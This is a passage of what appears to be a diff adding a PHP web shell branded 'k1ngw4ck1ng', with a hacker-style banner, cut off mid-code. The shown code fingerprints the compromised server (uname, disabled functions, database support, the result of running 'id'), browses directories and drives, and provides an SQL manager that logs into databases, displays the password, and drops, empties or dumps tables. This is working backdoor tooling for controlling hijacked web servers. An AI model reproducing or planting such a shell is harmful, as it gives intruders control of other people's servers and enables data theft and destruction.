+TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
+.style1 {
+	color: #FF0000;
+	font-weight: bold;
+}
+.style2 {font-size: -3}
+</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><div align="center"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"></p>
+  <p><font size="-3"><span class="style2"></br>
+ <font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4c</font><font color="white">k</font><font color="#333333">1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck</font><font color="white">1</font><font color="#333333">ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw</font><font color="white">4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ngw4ck1n</font><font color="#333333">gw</font><font color="white">4ck1n</font><font color="#333333">g</font><font color="white">w</font><font color="#333333">4ck1ngw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck</font><font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ng</font><font color="white">w4ck</font><font color="#333333">1ngw</font><font color="white">4ck1</font><font color="#333333">ngw4</font><font color="white">ck1</font><font color="#333333">ng</font><font color="white">w4c</font><font color="#333333">k1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1</font><font color="#333333">ngw</font><font color="white">4</font><font color="#333333">ck</font><font color="white">1ngw4ck1ng</font><font color="#333333">w</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">ck</font><font color="white">1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw</font><font color="white">4ck1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw4</font><font color="white">ck</font><font color="#333333">1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4ck1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1n</font><font color="#333333">g</font><font color="white">w4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1ngw4ck1</font><br>
+
+      <font color="#333333">ngw4ck1ngw4c</font><font color="white">k1ngw4ck1ng</font><font color="#333333">w4</font><font color="white">ck1n</font><font color="#333333">gw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw4ck1n</font><font color="#333333">gw4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ng</font><font color="white">w4ck1</font><font color="#333333">ngw4ck1</font><font color="white">ngw4ck1ngw4ck1ng</font><font color="#333333">w4ck1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw4</font><br>
+
+      <font color="#333333">ck1ngw4ck1ng</font><font color="white">w4ck1ngw</font><font color="#333333">4c</font><font color="white">k1ngw4c</font><font color="#333333">k1ng</font><font color="white">w4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4c</font><font color="white">k1ngw4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1ngw4ck1ngw4ck1ngw4ck1ngw</font><font color="#333333">4ck1ngw4ck1n</font><br>
+
+      <font color="#333333">gw4ck1ngw4ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4c</font><font color="white">k1ngw</font><font color="#333333">4</font><font color="white">ck1n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw4ck1ngw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4</font><font color="#333333">c</font><font color="white">k1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck1ngw4c</font><br>
+
+      <font color="#333333">k1ngw4ck1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw</font><font color="white">4ck1ngw4ck1n</font><font color="#333333">g</font><font color="white">w4ck1</font><font color="#333333">ngw4</font><font color="white">ck1ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw</font><font color="white">4ck1</font><font color="#333333">ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw</font><font color="#333333">4ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4ck</font><font color="white">1ngw4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4</font><font color="#333333">ck1n</font><font color="white">gw4</font><font color="#333333">ck1ngw4ck1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4</font><font color="white">c</font><font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1ngw4c</font><font color="white">k1ngw4</font><font color="#333333">c</font><font color="white">k</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4c</font><font color="white">k1n</font><font color="#333333">gw4ck1ngw4ck1ngw</font><font color="white">4ck1n</font><font color="#333333">gw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1ngw4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1</font><br>
+      <font color="#333333">ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4</font></br>
+  </span>&nbsp;</p></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>System Info:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>Disabled functions</b>: <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} ?><p align="left"><b>We are: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version');
+echo "<br/>cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>ON</font>";}else{$reg_g="<font color=red>OFF</font>";} echo("<b>Register globals:</b> $reg_g"); ?><?php echo "<br/>MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>";
+echo "<br/>MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?> </b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+
+}
+echo "<br>";
+echo "<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"><br/></font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr>
+    <td width="30%" height="1"><b>Create a new table:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td>
+    
+    <td width="30%" height="1"><b>Dump DataBase:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
